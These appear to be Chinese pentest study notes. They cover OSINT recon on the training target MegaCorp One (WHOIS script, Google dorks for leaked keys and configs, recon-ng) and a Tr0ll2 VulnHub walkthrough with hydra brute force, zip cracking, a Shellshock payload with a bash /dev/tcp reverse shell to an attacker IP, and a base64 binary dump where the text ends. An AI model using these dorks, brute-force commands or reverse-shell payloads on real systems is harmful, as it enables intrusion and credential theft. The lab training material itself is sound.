Domain Name	域名名称（如 `example.com`）。
Registry Domain ID	域名在注册局的唯一标识符（用于追踪变更）。
Registrar	域名注册商（如 GoDaddy、Namecheap）。
Creation Date	域名注册日期（可用于判断目标运营时长）。
Expiration Date	域名过期时间（若未续费可能被抢注）。
Updated Date	最后更新时间（如DNS记录或所有者变更）。
Domain Status	域名状态（如 `clientTransferProhibited` 表示禁止转移）。
Name Server	域名使用的DNS服务器（可进一步探测子域名）。
Registrant Contact	注册人信息（可能被隐私保护服务隐藏）。
Admin/Technical Contact	管理员和技术联系人信息（可能包含邮箱、电话）。

2. 隐私保护的影响

Whois Privacy：

注册商提供隐私保护服务时，关键信息（如姓名、邮箱、电话）会被替换为代理信息：
```
1Registrant Name: REDACTED FOR PRIVACY
2Registrant Email: contact@privacyguard.example
```
此时需通过其他方式（如历史记录、关联域名）绕过隐私保护。

3. IP WHOIS 的额外信息

IP 范围：

1NetRange: 192.0.2.0 - 192.0.2.255 # IP地址段
2CIDR: 192.0.2.0/24 # 子网掩码
3Organization: Example ISP # 所属机构（可能是ISP或企业）

3. 自动化工具整合

与脚本结合：使用 Python 的python-whois库批量查询域名：

 1import whois
 2from datetime import datetime
 3
 4def get_domain_info(domain_name):
 5 try:
 6 domain = whois.whois(domain_name)
 7
 8 info = {
 9 "域名": domain_name,
10 "注册商": domain.registrar,
11 "创建日期": format_date(domain.creation_date),
12 "过期日期": format_date(domain.expiration_date),
13 "最后更新": format_date(domain.updated_date),
14 "状态": list_to_str(domain.status), # 状态可能是列表
15 "DNS服务器": list_to_str(domain.name_servers),
16 # 关键修复：处理字段为 None 的情况，统一转为 'N/A'
17 "注册人姓名": getattr(domain, 'name', 'N/A') or 'N/A',
18 "注册人邮箱": getattr(domain, 'email', 'N/A') or 'N/A',
19 "注册人电话": getattr(domain, 'phone', 'N/A') or 'N/A',
20 "注册机构": getattr(domain, 'org', 'N/A') or 'N/A',
21 "地址": getattr(domain, 'address', 'N/A') or 'N/A'
22 }
23 return info
24 except Exception as e:
25 return {"错误": str(e)}
26
27def format_date(date):
28 if isinstance(date, list):
29 return [d.strftime("%Y-%m-%d") if isinstance(d, datetime) else d for d in date]
30 elif isinstance(date, datetime):
31 return date.strftime("%Y-%m-%d")
32 return date or 'N/A' # 处理日期为 None 的情况
33
34def list_to_str(data):
35 if isinstance(data, list):
36 return ", ".join(str(item) for item in data)
37 return data or 'N/A' # 处理数据为 None 的情况
38
39if __name__ == "__main__":
40 target_domain = "megacorpone.com"
41 result = get_domain_info(target_domain)
42
43 print("\n[+] WHOIS 情报分析结果:")
44 print("-" * 50)
45 for key, value in result.items():
46 if key == "错误":
47 print(f" ! 查询失败: {value}")
48 else:
49 print(f" {key:>12} : {value}")
50
51 # 修复判断逻辑：先检查是否为 'N/A'
52 if result.get('注册人邮箱', 'N/A') != 'N/A':
53 print("\n[+] 潜在攻击面建议:")
54 print(f" - 对邮箱 {result['注册人邮箱']} 进行钓鱼或密码爆破测试")
55 if result.get('DNS服务器', 'N/A') != 'N/A':
56 print(f" - 扫描DNS服务器 {result['DNS服务器']} 的开放端口（如53 UDP/TCP）")

Google 信息收集

用法总集篇：https://www.exploit-db.com/google-hacking-database

1. 敏感文件与数据泄露

语法	用途
`site:megacorpone.com filetype:sql`	搜索目标域名的SQL数据库文件（可能含明文密码或数据表结构）。
`site:megacorpone.com "-----BEGIN RSA PRIVATE KEY-----"`	查找泄露的SSH私钥。
`site:megacorpone.com filetype:env OR filetype:ini`	查找 `.env`（环境变量）或 `.ini`（配置文件），常含API密钥、数据库密码。
`site:megacorpone.com ext:sql intext:password`	搜索含密码字段的SQL文件。
`site:megacorpone.com "api_key" OR "api_secret"`	查找硬编码的API密钥。

2. 后台与登录入口

语法	用途
`site:megacorpone.com intitle:"login" inurl:/admin`	查找管理员登录页面（如 `/admin/login.php`）。
`site:megacorpone.com inurl:/wp-admin`	定位WordPress后台（若未重命名）。
`site:megacorpone.com intitle:"index of /cgi-bin"`	发现CGI脚本目录（可能含未授权访问的脚本）。
`site:megacorpone.com inurl:debug`	查找调试页面（如 `debug.php`，可能暴露代码逻辑）。

3. 服务器与目录信息泄露

语法	用途
`intitle:"index of" site:megacorpone.com`	列出开放目录（可能暴露敏感文件）。
`site:megacorpone.com "Directory listing for"`	另一种目录列表泄露的关键词。
`site:megacorpone.com "Apache/2.4.29 (Ubuntu) Server at"`	根据服务器Banner信息定位特定版本的主机（可关联CVE漏洞）。
`site:megacorpone.com "X-Powered-By: PHP/7.2"`	查找运行指定PHP版本的服务器。

4. 备份文件与历史数据

语法	用途
`site:megacorpone.com filetype:bak`	搜索备份文件（如 `web.config.bak`、`database.sql.bak`）。
`site:megacorpone.com inurl:/backup`	查找备份目录（可能含数据库或代码备份）。
`site:megacorpone.com "backup.zip"`	直接定位压缩备份文件。
`site:megacorpone.com "This is a snapshot of"`	查找网站快照备份页面。

5. 漏洞与错误信息利用

语法	用途
`site:megacorpone.com “error”	“warning”`
`site:megacorpone.com "sql syntax near"`	定位SQL报错页面（可能存在SQL注入漏洞）。
`site:megacorpone.com "Stack trace:"`	查找Java/PHP堆栈跟踪信息（暴露代码逻辑）。
`site:megacorpone.com "PHP Fatal error"`	发现PHP致命错误页面。

6. 员工与内部信息收集

语法	用途
`site:linkedin.com employees megacorpone.com`	搜索LinkedIn上目标公司的员工信息。
`site:megacorpone.com "confidential" OR "internal"`	查找标有“内部”或“机密”的文件。
`site:github.com "megacorpone.com" password`	在GitHub中搜索目标相关代码中的密码泄露。
`site:megacorpone.com "@megacorpone.com" filetype:csv`	查找包含公司邮箱的CSV文件（可能为员工列表）。

7. 高级组合技巧

排除干扰： site:megacorpone.com -site:www.megacorpone.com（排除主站，专注子域名）。
通配符模糊搜索： site:megacorpone.com inurl:prod*env（匹配 prod.env、production.env 等）。
时间范围限定：在Google搜索工具中限定时间（如过去一年），找到最新泄露的数据。

课后练习

Exercises

Who is the VP of Legal for MegaCorp One and what is their email address?
Use Google dorks (either your own or any from the GHDB) to search www.megacorpone.com for interesting documents.
What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?

练习 1

问题：找到 MegaCorp One 的法律副总裁（VP of Legal）及其邮箱地址。

Google Hacking 解法：

LinkedIn 员工信息挖掘：
```
1site:linkedin.com/in "MegaCorp One" "VP Legal" 
```
- 搜索 LinkedIn 上职位为 “VP Legal” 且公司为 “MegaCorp One” 的用户。
  
  https://www.linkedin.com/in/mike-carlow-8128896a/
公司网站内部页面：
```
1site:megacorpone.com "leadership" OR "executive team" "legal" 
```
- 在公司官网的“领导团队”或“管理层”页面中查找法律相关职位。
文档泄露：
```
1site:megacorpone.com filetype:pdf "VP Legal" email 
```
- 搜索公司 PDF 文件中提及法律副总裁和邮箱的内容。

练习 2

问题：使用 Google 语法（或 GHDB 中的语法）搜索 www.megacorpone.com 的“有趣文档”。

Google Hacking 解法：

敏感文件搜索：
```
1site:megacorpone.com filetype:pdf OR filetype:doc OR filetype:xls 
```
- 查找所有 PDF、Word、Excel 文档（可能含财务报告、客户数据）。
配置与备份文件：
```
1site:megacorpone.com (ext:env OR ext:bak OR ext:sql) 
```
- 搜索环境变量文件、备份文件或 SQL 数据库文件。
后台与登录入口：
```
1site:megacorpone.com inurl:admin OR intitle:"login" 
```
- 查找管理员后台或登录页面。
目录遍历：
```
1site:megacorpone.com intitle:"index of" "parent directory" 
```
- 发现开放目录列表（可能泄露源码、图片等）。

练习 3

问题：找出未在 www.megacorpone.com 官网列出的其他员工。

Google Hacking 解法：

社交媒体与代码库：

site:github.com “megacorpone.com” “employee” OR “staff”


- 在 GitHub 代码中搜索员工信息（如注释中的邮箱、测试账号）。

 ![image-20250524223824273](https://newblogimg.oss-cn-beijing.aliyuncs.com/2025/image-20250524223824273.png)

2. **会议与演讲记录**：

```markdown
site:youtube.com OR site:slideshare.net "MegaCorp One" "speaker"

查找公司员工在外部会议或演讲中公开的姓名和职位。

新闻稿与合作伙伴：
```
1site:news.google.com "MegaCorp One" "announces" OR "partner" 
```
- 从新闻稿中挖掘未在官网列出的员工（如项目负责人）。
WHOIS 与域名关联：
```
1"MegaCorp One" site:whois.com 
```
- 通过 WHOIS 查询关联域名，获取注册人姓名和邮箱（可能为员工）。

泄露的通讯录：

1site:megacorpone.com filetype:csv "contact" OR "employee"

搜索泄露的 CSV 通讯录文件。

Netcraft 信息收集

网址：https://searchdns.netcraft.com/

Recon-ng 信息收集workspaces create my_workspace

1. 安装与启动

安装（Kali 默认已预装，若需更新）：
```
1sudo apt update && sudo apt install recon-ng
```
启动：
```
1recon-ng
```

2. 基本工作流程

初始化数据库

首次使用时需创建数据库：

1workspaces create my_workspace # 创建工作区
2workspaces load my_workspace # 加载工作区

查看模块

列出所有可用模块：

1marketplace search

筛选特定模块（如域名枚举）：

1marketplace search domain

加载模块

例如查看，下载，加载 whois_pocs 模块（通过 WHOIS 查找域名信息）：

1marketplace info recon/domains-hosts/google_site_web
2marketplace install recon/domains-hosts/google_site_web
3modules load recon/domains-contacts/whois_pocs
4back # 回到主界面

设置参数

指定目标域名（以 example.com 为例）：

1options set SOURCE megacorpone.com

执行模块

运行当前加载的模块：（用代理运行）

1run

查看结果

查看数据库中的收集结果：

1show hosts # 显示主机信息
2show contacts # 显示邮箱/联系人

3. 常用模块示例

域名信息收集

1modules load recon/domains-hosts/hackertarget
2options set SOURCE megacorpone.com
3run

邮箱枚举（需 API 密钥，如 Hunter.io）

1modules load recon/domains-contacts/hunter_io
2keys add hunter_api YOUR_API_KEY # 替换为实际 API 密钥
3options set SOURCE example.com
4run

子域名爆破（使用 bruteforce 字典）：

1modules load recon/domains-hosts/brute_hosts
2options set SOURCE megacorpone.com
3options set WORDLIST /usr/share/wordlists/subdomains-top1million.txt
4run

IP 关联主机发现（使用 Shodan）：

1modules load recon/domains-hosts/shodan_hostname
2keys add shodan_api YOUR_API_KEY # 替换为 Shodan API 密钥
3options set SOURCE 192.168.1.1 # 设置目标 IP
4run

4. 高级技巧

批量执行模块：使用 resource 命令批量运行脚本：

1resource /path/to/script.txt

脚本内容示例：

1modules load recon/domains-hosts/hackertarget
2options set SOURCE example.com
3run
4modules load recon/domains-contacts/whois_pocs
5run

导出数据：将结果导出为 CSV：

1show contacts export /home/kali/contacts.csv
2show hosts export /home/kali/hosts.csv

API 密钥管理：添加或查看已配置的 API 密钥：

1keys add shodan_api YOUR_KEY # 添加密钥
2keys list # 列出所有密钥

练习Exercise

(Reporting is not required for this exercise)

Use the recon/domains-hosts/google_site_web and recon/hosts-hosts/resolve modules to gather information on MegaCorp One.
Take some time to explore other recon-ng modules.
使用 recon/domains-hosts/google_site_web 和 recon/hosts-hosts/resolve 模块收集 MegaCorp One 的信息。
探索其他 Recon-ng 模块。

1. 启动 Recon-ng 并创建工作区

recon-ng # 启动工具
workspaces create megacorp_one # 创建名为 megacorp_one 的工作区
workspaces load megacorp_one # 加载工作区

2. 使用 google_site_web 模块发现子域名

# 加载模块
modules load recon/domains-hosts/google_site_web

# 设置目标域名（假设目标域名为 megacorpone.com）
options set SOURCE megacorpone.com

# 执行模块
run

作用：通过 Google 搜索语法 site:megacorpone.com 查找所有关联子域名（如 dev.megacorpone.com、api.megacorpone.com 等），并将结果保存到数据库。

3. 使用 resolve 模块解析主机名 IP

# 加载模块
modules load recon/hosts-hosts/resolve

# 自动从数据库读取上一步发现的子域名，无需手动设置 SOURCE

# 执行模块
run

作用：将发现的子域名解析为 IP 地址（例如 dev.megacorpone.com → 192.168.1.100），结果存储在 hosts 表中。

4. 查看收集结果

show hosts # 显示所有主机名及其解析的 IP

5. 探索其他常用模块

以下为扩展操作示例，帮助进一步信息收集：

子域名爆破（使用字典爆破）：

modules load recon/domains-hosts/brute_hosts
options set SOURCE megacorpone.com
options set WORDLIST /usr/share/wordlists/subdomains-top1million.txt
run

邮箱枚举（需 Hunter.io API 密钥）：

modules load recon/domains-contacts/hunter_io
keys add hunter_api YOUR_API_KEY # 替换为实际 API 密钥
options set SOURCE megacorpone.com
run

端口扫描（使用 Bing 搜索引擎发现开放端口）：

modules load recon/hosts-ports/bing_ip
options set SOURCE 192.168.1.100 # 替换为目标 IP
run

WHOIS 查询（获取域名注册信息）：

modules load recon/domains-contacts/whois_pocs
options set SOURCE megacorpone.com
run

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day15 Tr0ll2 靶场WP

Tue, 20 May 2025 14:30:15 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Tr0ll: 2

靶场地址：https://www.vulnhub.com/entry/tr0ll-2,107/

信息收集

1sudo arp-scan -l
2nmap -sS -sV -A -T5 -p- 172.168.169.139

检查网页源码发现有注释信息，写着作者是Tr0ll，用vim编辑的这个网页，我们就能推测，某个功能可能是ssh，可能是ftp的用户名应该有Tr0ll，之后的收集中要注意找密码。

打开看到一个滑稽的图片，看到web服务器是apache就想到应该要查一下网页的目录。

1dirb http://172.168.169.139/

看到有个robots.txt是机器人爬虫的协议，越不让看什么越要看什么。

我们把所有目录都翻一遍可以看到出了以上几个目录有图片，其他几个目录都没有东西。这四个目录是：

1http://172.168.169.139/noob/
2http://172.168.169.139/keep_trying/
3http://172.168.169.139/dont_bother/
4http://172.168.169.139/ok_this_is_it/

图片隐写信息

检查网页源代码都没有什么有用信息，那么我们把目光放到图片上来，图片可能又隐写信息。在kali中下载这些图片，kali会自动重命名。可以看到第3次下载的图片大小何其他几个不同。

1wget http://172.168.169.139/noob/cat_the_troll.jpg
2wget http://172.168.169.139/keep_trying/cat_the_troll.jpg
3wget http://172.168.169.139/dont_bother/cat_the_troll.jpg
4wget http://172.168.169.139/ok_this_is_it/cat_the_troll.jpg

1strings cat_the_troll.jpg.3

base64解码

可以看到第3哥图片比其他几个图片在末尾隐藏了一段话，其中y0ur_self极有可能是目录。打开看到如下文件，应该是base64加密。

这个文件很想一个爆破后留下的，推测密码应该在其中，用base64解码后再用hydra爆破尝试一下。

1base64 -d answer.txt > pass.txt
2hydra -l Tr0ll -P pass.txt 172.168.169.139 ssh -v
3hydra -l Tr0ll -P pass.txt 172.168.169.139 ftp -v

默认密码尝试ftp登录

但是爆破不成功，这个可能是靶机作者给我们的误导，所以我们换个思路，尝试默认弱口令登录。尝试ftp登录后发现提示用户名Tr0ll，尝试用户名何密码都是这个后成功登录。发现有一个zip文件，下载后查看。

ZIP密码爆破

解压压缩包发现要密码，所以之前的answer.txt并不是登录密码，而是压缩包的密码。

用一下两个命令都可以爆破压缩包密码。

1zip2john lmao.zip > lmao.txt && john --wordlist=pass.txt lmao.txt 
2fcrackzip -u -D -p pass.txt lmao.zip

解压后似乎是一个密钥文件，有密钥的话我们就可以ssh登录了。

SSH密钥登录

直接登录时不行的

1ssh -i noob noob@172.168.169.139

用以下命令查看为什么报错

1ssh -vvv -i noob noob@172.168.169.139
2
3---
4OpenSSH_9.9p2 Debian-2, OpenSSL 3.5.0 8 Apr 2025

可能因为版本太老了，我尝试 强制客户端使用旧版签名算法在 SSH 命令中指定兼容旧服务器的签名算法：

1ssh -i noob noob@172.168.169.139 -o PubkeyAcceptedKeyTypes=+ssh-rsa

也不行。查资料发现可以利用shellcode漏洞。

CVE-2014-6271 是著名的 Shellshock 漏洞（又称 “Bash 破壳漏洞”），它影响了广泛使用的 Unix/Linux 系统中的 Bash 解释器。该漏洞允许攻击者通过环境变量注入恶意代码，从而远程执行任意命令。以下是漏洞利用的详细方法：

SSH强制命令

若目标允许通过SSH公钥认证并配置了强制命令（如 command="example"）：

1ssh -i id_rsa user@target '() { :;}; /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1'

1ssh -i noob -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa noob@172.168.169.139 '() { :;}; cat /etc/passwd'
2ssh -i noob -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa noob@172.168.169.139 '() { :;}; /bin/bash'

1python -c 'import pty; pty.spawn("/bin/bash")'

换个好看的shell，到根目录下查看发现有个nothing_to_see_here目录，此地无银三百两。

在这个文件夹下有几个door文件夹，里面有可执行文件，执行了之后，我们就好像踩雷了。所有的命令出了似乎都没有权限了就。

1noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./r00t
2./r00t
3Good job, stand by, executing root shell...
4BUHAHAHA NOOB!
5noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t
6./r00t
7
82 MINUTE HARD MODE LOL

查阅其他WP发现用下面这个命令也可以找到三个door文件夹下面的脚本。

1find / -perm -4000 -print 2>/dev/null

是一个用于查找系统中具有 SUID 权限（Set User ID） 文件的命令。发现这三个命令有SUID权限。

扩展命令

查找 SGID 文件（Set Group ID）：

find / -perm -2000 -print 2>/dev/null

查找全局可写文件：

find / -perm -0002 -type f 2>/dev/null

似乎就没法搞了，只能回复快照。

顺带找一下内核信息

1uname -a
2Linux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
3lsb_release -a
4sh: 0: getcwd() failed: No such file or directory
5No LSB modules are available.
6Distributor ID: Ubuntu
7Description: Ubuntu 12.04.1 LTS
8Release: 12.04
9Codename: precise

缓存溢出漏洞

方法一：gdb调试找偏移

我们重新回到ssh登录，再次找到这几个文件夹，这次我们就不执行了。先ls一下看看文件属性，可以看到door1和door2的脚本都是7.2K，只有door3的脚本比较特殊是8.3K

1ls -lahR

1cd door3
2base64 r00t

得到如下结果

 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
 33AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 34AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 35AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 36AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 37AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 38AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 39AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 40AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 41AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 42AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 43AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 44AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 45AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 46AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 47AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 48AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 49AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 51AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 52AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 53AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 54AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 55AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 56AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 57AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 58AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 59AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 60AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 61AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 62AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 64AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 65AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 66AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 67AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 68AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA
 69AAAAAAEAAAAQAAAADAAAAPSCBAgNAAAAXIUECPX+/2+sgQQIBQAAADyCBAgGAAAAzIEECAoAAABY
 70AAAACwAAABAAAAAVAAAAAAAAAAMAAAD0nwQIAgAAACgAAAAUAAAAEQAAABcAAADMggQIEQAAAMSC
 71BAgSAAAACAAAABMAAAAIAAAA/v//b6SCBAj///9vAQAAAPD//2+UggQIAAAAAAAAAAAAAAAAAAAA
 72AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACifBAgAAAAAAAAAAEaDBAhWgwQI
 73ZoMECHaDBAiGgwQIAAAAAAAAAABHQ0M6IChVYnVudHUvTGluYXJvIDQuNi4zLTF1YnVudHU1KSA0
 74LjYuMwAcAAAAAgAAAAAABAAAAAAARIQECGMAAAAAAAAAAAAAABEBAAACAAAAAAAEAUoAAAABcwAA
 75AD8AAABEhAQIp4QECAAAAAACBAcfAAAAAgEILAAAAAICB1sAAAACBAcaAAAAAgEGLgAAAAICBXkA
 76AAADBAVpbnQAAggFAAAAAAIIBxUAAAACBAUFAAAABARxAAAAAgEGNQAAAAQEfgAAAAVxAAAABgE6
 77AAAAAQMBTwAAAESEBAinhAQIAAAAAAIBAAAHVgAAAAEDTwAAAAKRAAeDAAAAAQMCAQAAApEECGJ1
 78ZgABBQgBAAACdBAJAQ4AAAACAAFrAAAAAecAAAAKawAAAAp4AAAAAAtWhAQIeIQECAwBbgAAAAIA
